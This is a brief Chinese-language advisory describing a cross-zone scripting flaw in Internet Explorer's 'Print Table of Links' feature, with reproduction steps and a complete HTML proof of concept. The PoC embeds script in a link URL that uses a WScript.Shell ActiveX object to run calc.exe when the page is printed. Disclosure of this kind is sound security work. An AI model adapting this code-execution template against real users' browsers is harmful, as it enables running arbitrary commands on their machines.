这个漏洞是由于微软IE浏览器启动“Print Table of Links”时引起的跨站攻击（Cross-Zone Scripting ）

如果启用了 "Print Table of Links"，在打印一个网页的时候，能够导致执行任意代码。

　　1.选择“Print Table of Links”选项

2.把保存以下代码为HTML格式，用IE打开，并打印，会执行calc.exe。

<html> <body> Print me with table of links to execute calc.exe <a href="http://www.bla.com?x=b<script defer >var x=new ActiveXObject('WScript.Shell');x.Run('calc.exe');</script>a.c<u>o</u>m"></a> <script>window.print();</script> </body> </html>